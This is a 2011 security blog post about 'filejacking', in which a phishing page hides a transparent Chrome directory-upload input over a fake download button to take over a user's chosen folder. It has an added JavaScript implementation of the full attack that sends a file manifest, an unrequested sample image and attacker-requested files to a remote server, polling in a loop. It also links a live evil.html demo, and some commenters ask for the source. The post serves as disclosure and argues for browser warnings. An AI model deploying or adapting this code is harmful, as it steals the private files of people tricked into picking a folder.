Thursday, April 14, 2011

Filejacking: How to make a file server from your browser (with HTML5 of course)

Back in the days of the browser wars there was a joke: Internet Explorer is the only web browser that lets the Internet browse your computer. Through its many security flaws IE could be exploited for remote code execution, which could, for example, steal your sensitive files.
But times are different now. Current browsers are not that easy to exploit, and they get patched (relatively) quickly. Attackers cannot easily reach your files through browser vulnerabilities, so they turn to the weakest link: users. In this post we'll explore what current browsers can do with your files.

Your file, please

How can a website access a user's files? Traditionally, the user has to upload the file. Users commonly share photos and videos, upload files to online conversion tools, and so on. You could (theoretically) be tricked into uploading a sensitive file to a malicious website ("please submit your private key so we can check its strength"), but, seriously, who falls for that?

Lately, the File API has allowed JavaScript to access a file as soon as the user chooses it (i.e. before it is uploaded). Apart from delivering a better file-upload experience, it can also be used maliciously to steal files in an XSS attack: the injected script reads the chosen file and sends it wherever it likes. Also, with clever styling you can hide the input type=file control so that the user is unaware that they are about to hand over a file. But still, the only file that leaks is the one the user picked in the 'Open File' dialog.

Users know what file uploading is and are reluctant to choose Downloaded Files/nothing here/move along/boring family photos/1/b00bs.jpg while working inside a browser, so it's not a big deal, right?

Wrong. It's 2011, web applications need new features, browsers are hurrying to implement them, and sometimes security is an afterthought.

But first, a gift

I've got some gifts for you. I gathered some of the latest hacking tricks for all browsers and spiced them up with an algorithm that will send you a ZIP file crafted especially for you based on your answers. Just fill out the short quiz and wait for the file download.

Update: I'm currently experiencing a traffic spike on the server, so generating the file might take a while.

Using Chrome / Chromium please navigate to:

http://kotowicz.net/wu/

and claim your gift :)

Now back to me

input type=file directory is a splendid feature. It allows you to upload the contents of a chosen directory. Great when you'd like to submit a gallery of pictures to Facebook, ain't it? Currently it's implemented in WebKit (latest Chrome / Chromium, where the attribute is vendor-prefixed as webkitdirectory), not yet in Safari, Firefox or any other browser.

However, it has a problem: the feature is new to users, they don't know what its consequences are, and there are no warnings either. For all they know, they're just selecting a folder in the OS-native "select folder" dialog, exactly as they do when choosing a download destination.

While you probably didn't fall for my trick, most users are not that smart or security-minded. And the consequences of sharing a folder are much worse than those of sharing a single file. Don't believe me? See
http://attacker.kotowicz.net/wu/evil.html, the backend of the service. Or just look at the video:


File server inside your browser

The given example is another instance of a UI redressing attack exploiting new HTML5 features. The elements of the scam:
  • a phishing site with a "hacking tricks" bait
  • a transparent input type=file directory laid over the fake download button
  • launching another window to perform the real work (to survive the user closing the initial window)
  • the new window sends the list of files from the chosen directory to the server
  • additionally, it uploads one sample image, if it finds one in your directory
  • ... and polls the server repeatedly for further commands
  • the server control panel shows the list of connected clients and their files
  • the server operator chooses the files to download
  • the requests for new files reach the clients, which send the files back
Your browser has now become a file server, serving files from your chosen directory. More features follow:
  • cross-domain
  • easily delivered through an XSS vulnerability
  • server and client could be automated to e.g. send all Excel files at once
  • and it's HTML5 compatible
Nifty! 
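The pieces listed above, together with the File API read-before-upload trick from earlier in the post, as an added example written for this page; it is not the original evil.html or its backend, which the post does not reproduce. The file handling is split into pure functions over File-like objects ({ name, size, type, webkitRelativePath }, the shape a Chrome directory-input FileList has) so the logic can be exercised without a browser; only installFilejacking() and startWorker() touch the DOM. The server endpoints (/manifest, /file, /cmd), the command shape ({ op: "get", path }), the worker page URL and SAMPLE_FILES are all assumptions constructed for the example, and fetch/postMessage stand in for whatever the 2011 demo used.

```javascript
// Added example, not the post's own evil.html. File-like objects are
// assumed to carry { name, size, type, webkitRelativePath } exactly as an
// <input type="file" webkitdirectory> FileList does in Chrome.
const IMAGE_TYPES = new Set(["image/jpeg", "image/png", "image/gif"]);

// Constructed sample "directory"; stands in for input.files outside a browser.
const SAMPLE_FILES = [
  { name: "notes.txt", size: 10, type: "text/plain", webkitRelativePath: "docs/notes.txt" },
  { name: "cat.jpg", size: 2048, type: "image/jpeg", webkitRelativePath: "docs/pics/cat.jpg" },
  { name: "q1.xlsx", size: 4096, type: "", webkitRelativePath: "docs/fin/q1.xlsx" },
];

// Directory uploads set webkitRelativePath; a plain single-file input (the
// File API case) leaves it empty, so fall back to the bare name.
function relPath(f) {
  return f.webkitRelativePath || f.name;
}

// Step 1: metadata manifest sent to the server right after the pick.
function buildManifest(files) {
  return Array.from(files).map((f) => ({
    path: relPath(f),
    size: f.size,
    type: f.type || "application/octet-stream",
  }));
}

// Step 2: the one "sample" image uploaded unasked, if the directory has one.
function pickSampleImage(files) {
  return Array.from(files).find((f) => IMAGE_TYPES.has(f.type)) || null;
}

// Step 3: resolve a polled command against the picked files. The FileList is
// all the page can see, so any path not in the manifest (traversal strings
// included) simply resolves to null.
function resolveCommand(cmd, files) {
  if (!cmd || cmd.op !== "get" || typeof cmd.path !== "string") return null;
  return Array.from(files).find((f) => relPath(f) === cmd.path) || null;
}

// Automation hook from the post: "send all Excel files at once".
function selectByExtension(files, exts) {
  const wanted = new Set(exts.map((e) => e.toLowerCase()));
  return Array.from(files).filter((f) => {
    const m = /\.([^.\/]+)$/.exec(relPath(f));
    return m !== null && wanted.has(m[1].toLowerCase());
  });
}

// Bait page: a fully transparent directory picker over the fake download
// button (UI redressing), then the File objects are handed to a popup.
// Returns null when there is no DOM, e.g. under node.
function installFilejacking(button, workerUrl) {
  if (typeof document === "undefined") return null;
  const input = document.createElement("input");
  input.type = "file";
  input.setAttribute("webkitdirectory", ""); // Chrome's directory upload
  input.style.cssText =
    "position:absolute;top:0;left:0;width:100%;height:100%;opacity:0;cursor:pointer";
  button.style.position = "relative";
  button.appendChild(input);
  input.addEventListener("change", () => {
    const files = Array.from(input.files);
    const popup = window.open(workerUrl, "_blank");
    // Handshake instead of onload, so a cross-origin popup (the XSS case)
    // works too. File objects are structured-cloneable, so the popup gets
    // real references and keeps working after the bait window is closed.
    window.addEventListener("message", (ev) => {
      if (ev.source === popup && ev.data === "ready") popup.postMessage(files, "*");
    });
  });
  return input;
}

// Popup (worker) page: announce readiness, receive the files, then serve
// them. The attacker's server must answer /cmd with CORS headers so the JSON
// is readable cross-domain; the POST bodies need no such permission.
function startWorker(serverBase) {
  if (typeof window === "undefined" || !window.opener) return null;
  window.addEventListener("message", (ev) => {
    if (ev.source === window.opener && Array.isArray(ev.data)) serveFiles(ev.data, serverBase);
  });
  window.opener.postMessage("ready", "*");
  return true;
}

async function serveFiles(files, serverBase) {
  const post = (f) =>
    fetch(serverBase + "/file?path=" + encodeURIComponent(relPath(f)), { method: "POST", body: f });
  await fetch(serverBase + "/manifest", { method: "POST", body: JSON.stringify(buildManifest(files)) });
  const sample = pickSampleImage(files);
  if (sample) await post(sample);
  for (;;) { // poll until the popup is closed
    const cmd = await (await fetch(serverBase + "/cmd")).json();
    const f = resolveCommand(cmd, files);
    if (f) await post(f);
    await new Promise((r) => setTimeout(r, 2000));
  }
}
```

Two things worth noticing. resolveCommand() can only ever return something the user actually picked, because the FileList is the whole universe the page sees, so a traversal string in a command fails by construction; the damage is bounded by the directory chosen, which is exactly why the choice of directory matters so much. And the cross-window hand-off works because File objects survive structured cloning, which is what lets the popup keep serving after the bait window is gone.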

Brave new world?

Current web applications demand more power from browsers. With features like
  • directory upload, 
  • offline storage, 
  • drag & drop support
  • extensive styling
  • audio & video support
  • WebSockets
  • notifications 
they're getting closer to desktop applications each year. Granted, they all run in a browser "sandbox" with its security policies.

However, users are not aware of what a current browser can do, so they can be tricked into running a malicious app. And with XSS being so popular, the malicious app may be pretty much any site on the Internet.

Browser vendors try to educate users and prevent them from choosing unsafe settings (the Geolocation permission bar is an example). Shouldn't a similar warning be displayed when using input type=file directory? After all, it's only one click away, and the risks of sharing a whole directory are huge. So, WebKit, what do you think?

15 comments:

Spooky said...

Really impressive

Upset said...

NO NO NO! You had the opportunity. You had the ability. You had the knowledge.

But you *STILL* called it 'Filejacking'. =(

kkotowicz said...

And... ? It's just the name, and you've got to love those *jacking techniques, there's one every other week ;)

Guest said...

Lol, I selected a folder with images in it, in order to try it, but I didn't know that it will upload one sample image immediately. I hope you can remove it from the server as soon as possible :) Nice work, btw.

Marcus Niemietz said...

I think the term is very obvious. I'm waiting for the next *jacking attack. :-)

Guest said...

cool work, great demo

Solver said...

Nice work!! I tried to upload the script but it didn't work for me. When I open evil.html there is nothing showing. Can you tell me how to set up the script on my host?

lukasz said...

evil.html is disabled?

kkotowicz said...

It should be ok now (it only works on Chrome)

John Gillott said...

As your latest victim, I am quite impressed. I was looking for something to learn over the summer in preparation for studying Computer Science at university; could you direct me to any online resources that you have found useful or think I might find beneficial?

John Gillott said...

Thank you :)

Ron Allan Dolorosa said...

Building a file server in 10 minutes is very easy, see here: http://personalfileserver.blogspot.com/2012/01/how.html

yahoo-AYJZF5G3Z45YMNZKFB55V4KWTM said...

I like the one where the guy pulls a rabbit out of a hat! At first, I "downloaded" the file in an empty folder so I didn't get the parlor trick. Had to really read everything to get jacked up! :-P

gron said...

Do you have the source code for me?

yheeman said...

Do you have the source code for me?